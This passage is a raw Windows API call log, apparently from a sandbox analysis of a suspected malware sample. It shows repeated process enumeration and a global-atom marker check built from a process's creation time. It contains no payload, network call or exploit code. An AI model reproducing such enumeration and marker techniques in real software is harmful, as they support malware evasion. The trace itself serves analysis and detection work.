	[0095.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.149] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.149] CloseHandle (hObject=0x248) returned 1
	[0095.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.150] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.150] CloseHandle (hObject=0x248) returned 1
	[0095.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.150] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.150] CloseHandle (hObject=0x248) returned 1
	[0095.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.150] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.150] CloseHandle (hObject=0x248) returned 1
	[0095.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.150] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.150] CloseHandle (hObject=0x248) returned 1
	[0095.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.150] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.150] CloseHandle (hObject=0x248) returned 1
	[0095.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.151] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.151] CloseHandle (hObject=0x248) returned 1
	[0095.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.151] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.151] CloseHandle (hObject=0x248) returned 1
	[0095.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.151] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.151] CloseHandle (hObject=0x248) returned 1
	[0095.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.151] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.151] CloseHandle (hObject=0x248) returned 1
	[0095.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.151] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.151] CloseHandle (hObject=0x248) returned 1
	[0095.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.152] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.152] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.152] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.152] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.152] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.153] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.153] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.153] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.153] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.153] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.153] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.153] CloseHandle (hObject=0x248) returned 1
	[0095.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.153] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.153] CloseHandle (hObject=0x248) returned 1
	[0095.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.224] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.224] CloseHandle (hObject=0x248) returned 1
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.225] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.225] CloseHandle (hObject=0x248) returned 1
	[0095.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.225] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.225] CloseHandle (hObject=0x248) returned 1
	[0095.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.225] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.225] CloseHandle (hObject=0x248) returned 1
	[0095.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.225] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.225] CloseHandle (hObject=0x248) returned 1
	[0095.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.226] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.226] CloseHandle (hObject=0x248) returned 1
	[0095.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.226] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.226] CloseHandle (hObject=0x248) returned 1
	[0095.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.226] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.226] CloseHandle (hObject=0x248) returned 1
	[0095.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.226] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.226] CloseHandle (hObject=0x248) returned 1
	[0095.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.226] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.226] CloseHandle (hObject=0x248) returned 1
	[0095.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.227] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.227] CloseHandle (hObject=0x248) returned 1
	[0095.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.227] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.227] CloseHandle (hObject=0x248) returned 1
	[0095.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.227] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.227] CloseHandle (hObject=0x248) returned 1
	[0095.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.227] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.227] CloseHandle (hObject=0x248) returned 1
	[0095.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.227] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.227] CloseHandle (hObject=0x248) returned 1
	[0095.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.227] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.228] CloseHandle (hObject=0x248) returned 1
	[0095.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.228] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.228] CloseHandle (hObject=0x248) returned 1
	[0095.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.228] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.228] CloseHandle (hObject=0x248) returned 1
	[0095.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.228] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.228] CloseHandle (hObject=0x248) returned 1
	[0095.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.228] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.228] CloseHandle (hObject=0x248) returned 1
	[0095.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.228] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.228] CloseHandle (hObject=0x248) returned 1
	[0095.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.229] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.229] CloseHandle (hObject=0x248) returned 1
	[0095.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.229] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.229] CloseHandle (hObject=0x248) returned 1
	[0095.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.229] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.231] CloseHandle (hObject=0x248) returned 1
	[0095.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.231] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.231] CloseHandle (hObject=0x248) returned 1
	[0095.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.231] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.231] CloseHandle (hObject=0x248) returned 1
	[0095.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.231] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.231] CloseHandle (hObject=0x248) returned 1
	[0095.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.232] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.232] CloseHandle (hObject=0x248) returned 1
	[0095.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.250] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.250] CloseHandle (hObject=0x248) returned 1
	[0095.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.250] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.250] CloseHandle (hObject=0x248) returned 1
	[0095.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.250] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.250] CloseHandle (hObject=0x248) returned 1
	[0095.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.251] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.251] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.251] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.251] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.251] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.252] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.252] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.252] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.252] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.252] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.252] CloseHandle (hObject=0x248) returned 1
	[0095.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.252] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.252] CloseHandle (hObject=0x248) returned 1
	[0095.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.333] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.333] CloseHandle (hObject=0x248) returned 1
	[0095.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.334] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.334] CloseHandle (hObject=0x248) returned 1
	[0095.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.334] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.334] CloseHandle (hObject=0x248) returned 1
	[0095.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.334] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.334] CloseHandle (hObject=0x248) returned 1
	[0095.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.335] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.335] CloseHandle (hObject=0x248) returned 1
	[0095.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.335] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.335] CloseHandle (hObject=0x248) returned 1
	[0095.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.335] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.335] CloseHandle (hObject=0x248) returned 1
	[0095.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.335] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.335] CloseHandle (hObject=0x248) returned 1
	[0095.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.335] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.336] CloseHandle (hObject=0x248) returned 1
	[0095.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.336] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.336] CloseHandle (hObject=0x248) returned 1
	[0095.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.336] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.336] CloseHandle (hObject=0x248) returned 1
	[0095.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.336] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.336] CloseHandle (hObject=0x248) returned 1
	[0095.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.336] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.336] CloseHandle (hObject=0x248) returned 1
	[0095.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.337] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.337] CloseHandle (hObject=0x248) returned 1
	[0095.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.337] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.337] CloseHandle (hObject=0x248) returned 1
	[0095.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.337] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.337] CloseHandle (hObject=0x248) returned 1
	[0095.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.337] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.337] CloseHandle (hObject=0x248) returned 1
	[0095.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.337] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.337] CloseHandle (hObject=0x248) returned 1
	[0095.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.337] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.338] CloseHandle (hObject=0x248) returned 1
	[0095.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.338] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.338] CloseHandle (hObject=0x248) returned 1
	[0095.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.338] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.338] CloseHandle (hObject=0x248) returned 1
	[0095.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.338] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.338] CloseHandle (hObject=0x248) returned 1
	[0095.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.338] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.338] CloseHandle (hObject=0x248) returned 1
	[0095.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.338] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.339] CloseHandle (hObject=0x248) returned 1
	[0095.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.339] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.339] CloseHandle (hObject=0x248) returned 1
	[0095.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.339] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.339] CloseHandle (hObject=0x248) returned 1
	[0095.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.339] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.339] CloseHandle (hObject=0x248) returned 1
	[0095.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.339] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.339] CloseHandle (hObject=0x248) returned 1
	[0095.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.339] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.340] CloseHandle (hObject=0x248) returned 1
